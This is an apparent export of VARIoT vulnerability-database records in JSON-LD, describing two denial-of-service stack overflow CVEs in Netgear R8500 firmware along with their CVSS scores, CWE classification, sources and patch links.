{
"date": "2025-04-22T18:13:56.557000",
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 Classic buffer overflow vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
}
],
"trust": 0.8
}
}
VAR-202411-0558
Vulnerability from variot - Updated: 2025-04-25 01:55Netgear R8500 v1.0.2.160 was discovered to contain multiple stack overflow vulnerabilities in the component ipv6_fix.cgi via the ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, and ipv6_lan_length parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length and ipv6_lan_length parameters in the ipv6_fix.cgi component to properly verify the length of the input data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-0558",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"cve": "CVE-2024-50994",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-44813",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-50994",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-022720",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-50994",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-022720",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2024-44813",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain multiple stack overflow vulnerabilities in the component ipv6_fix.cgi via the ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, and ipv6_lan_length parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length and ipv6_lan_length parameters in the ipv6_fix.cgi component to properly verify the length of the input data",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-50994"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"db": "CNVD",
"id": "CNVD-2024-44813"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-50994",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022720",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-44813",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"id": "VAR-202411-0558",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
}
]
},
"last_update_date": "2025-04-25T01:55:29.241000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 ipv6_fix.cgi component ipv6_wan_ipaddr parameter buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612616"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-50994"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_36/36.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-44813"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44813"
},
{
"date": "2025-04-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"date": "2024-11-05T15:15:23.533000",
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44813"
},
{
"date": "2025-04-23T05:48:00",
"db": "JVNDB",
"id": "JVNDB-2024-022720"
},
{
"date": "2025-04-22T18:11:27.543000",
"db": "NVD",
"id": "CVE-2024-50994"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 Classic buffer overflow vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-022720"
}
],
"trust": 0.8
}
}
VAR-202411-0987
Vulnerability from variot - Updated: 2025-04-25 01:52Netgear R8500 v1.0.2.160 was discovered to contain a stack overflow via the share_name parameter at usb_remote_smb_conf.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the share_name parameter in the usb_remote_smb_conf.cgi component failing to properly verify the length of the input data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-0987",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"cve": "CVE-2024-50995",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-45304",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-50995",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-022719",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-50995",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-022719",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2024-45304",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain a stack overflow via the share_name parameter at usb_remote_smb_conf.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the share_name parameter in the usb_remote_smb_conf.cgi component failing to properly verify the length of the input data",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-50995"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"db": "CNVD",
"id": "CNVD-2024-45304"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-50995",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022719",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-45304",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"id": "VAR-202411-0987",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
}
]
},
"last_update_date": "2025-04-25T01:52:55.360000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 usb_remote_smb_conf.cgi component buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612636"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-50995"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_40/40.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-45304"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45304"
},
{
"date": "2025-04-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"date": "2024-11-05T15:15:23.620000",
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45304"
},
{
"date": "2025-04-23T05:48:00",
"db": "JVNDB",
"id": "JVNDB-2024-022719"
},
{
"date": "2025-04-22T18:11:51.507000",
"db": "NVD",
"id": "CVE-2024-50995"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 Classic buffer overflow vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-022719"
}
],
"trust": 0.8
}
}